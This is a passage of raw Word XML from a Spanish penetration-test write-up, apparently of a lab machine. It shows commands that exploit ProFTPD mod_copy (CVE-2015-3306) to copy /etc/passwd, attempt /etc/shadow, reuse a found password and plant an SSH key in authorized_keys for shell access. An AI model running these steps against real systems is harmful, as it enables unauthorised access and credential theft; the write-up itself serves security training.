        <w:spacing w:after="10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A través de SMB (que autentica como el usuario real, evitando el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root_squash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del NFS) se leyó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/var/log/secure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. El registro reveló que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">root inicia sesión por contraseña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desde una estación administrativa.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ smbclient //192.168.56.104/smbdata -U smbuser%smbuser -c "get secure /tmp/secure.txt"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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$ grep -i 'Accepted password for root' /tmp/secure.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 8 · /var/log/secure: autenticaciones de root por contraseña.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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3B2E5A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Análisis de la configuración de Samba</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Mediante mod_copy se exfiltró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smb.conf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. La configuración confirmó recursos inseguros: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smbdata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222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">escribible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homes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con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read only = No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, y la exposición deliberada de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/var/log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.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 9 · smb.conf: recursos escribibles y exposición de /var/log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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3B2E5A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Lectura arbitraria de archivos con mod_copy (CVE-2015-3306)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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ProFTPD 1.3.5 permite copiar archivos del sistema sin autenticación mediante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SITE CPFR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SITE CPTO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. Se usó para copiar archivos legibles a un recurso accesible por SMB.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ printf 'SITE CPFR /etc/passwd\r\nSITE CPTO /smbdata/samba/pw.txt\r\n' \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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    | nc -q 2 192.168.56.104 2121   # → 250 Copy successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 10 · mod_copy copia /etc/passwd a un recurso legible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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3B2E5A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Exfiltración de /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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El archivo copiado se descargó por SMB. Reveló la línea de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">smbuser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(home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/home/smbuser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, shell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/bin/bash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) y la de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">root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, definiendo el objetivo de acceso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 11 · /etc/passwd exfiltrado: smbuser y root confirmados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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3B2E5A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Verificación del squash de NFS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Se comprobó que el export NFS aplicaba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root_squash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: al escribir como root, los archivos quedaban como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nobody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. Esto limitaba la lectura de archivos sensibles por NFS, pero no por SMB.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ sudo touch /tmp/nfs_mount/rc_test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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$ ls -l /tmp/nfs_mount/rc_test   # → nobody nobody</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 12 · NFS con root_squash confirmado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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3B2E5A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Intento de robo de /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Se intentó copiar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/etc/shadow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con mod_copy, pero ProFTPD corre sin privilegios suficientes para leerlo: la operación fue denegada. Esto descartó el crackeo directo de hashes y orientó el ataque hacia la inyección de llave SSH.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ printf 'SITE CPFR /etc/shadow\r\nSITE CPTO /smbdata/samba/sh.txt\r\n' | nc ...</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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550 CPTO: Permission denied</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 13 · Robo de /etc/shadow denegado (ProFTPD sin privilegios).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F7941D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">06</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F7941D" w:sz="18"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Fase III — Explotación (acceso inicial)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="14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El SSH solo aceptaba autenticación por llave pública, por lo que la estrategia fue colocar una llave controlada por el atacante en el home de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smbuser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.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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F7941D" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  SSH exige llave pública</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Un intento de login por contraseña fue rechazado: el servidor respondió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Permission denied (publickey)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, confirmando que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PasswordAuthentication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estaba deshabilitado para usuarios normales.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ ssh smbuser@192.168.56.104</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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Permission denied (publickey,gssapi-keyex,gssapi-with-mic).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 14 · SSH rechaza la contraseña: solo acepta llave.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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F7941D" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Confirmación de la configuración SSH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Se exfiltró el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sshd_config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real con mod_copy. Confirmó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PasswordAuthentication no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PermitRootLogin yes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y un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AuthorizedKeysFile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estándar (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~/.ssh/authorized_keys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): la llave debía ir en el home del usuario.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 15 · sshd_config real: ruta estándar de llaves autorizadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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F7941D" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Descubrimiento de la credencial de sistema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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La contraseña de Samba (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smbuser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) no servía para el FTP. Probando el login FTP se descubrió que la contraseña de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">sistema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de smbuser era distinta: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">`rootroot1`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(la de Samba falló con 530).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ ftp 192.168.56.104   # smbuser / smbuser  → 530 Login incorrect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 16 · La contraseña de Samba falla en el FTP del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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F7941D" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Inyección de la llave SSH vía FTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Con la credencial de sistema correcta (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smbuser:rootroot1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), el FTP permitió login local en el home de smbuser. Se generó un par de llaves en Kali, se creó el directorio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.ssh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y se subió la llave pública como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authorized_keys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.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ ssh-keygen -t rsa -f smbuser_key -N ''</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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$ ftp 192.168.56.104    # smbuser / rootroot1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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ftp&gt; mkdir .ssh</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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ftp&gt; cd .ssh</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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ftp&gt; put smbuser_key.pub authorized_keys   # 226 Transfer complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 17 · Llave pública inyectada en el home de smbuser por FTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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F7941D" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Acceso interactivo como smbuser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Con la llave privada se obtuvo una </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">shell SSH como smbuser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. El banner confirmó el objetivo y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uname -a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reveló un dato decisivo: kernel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3.10.0-229.el7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(marzo de 2015).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
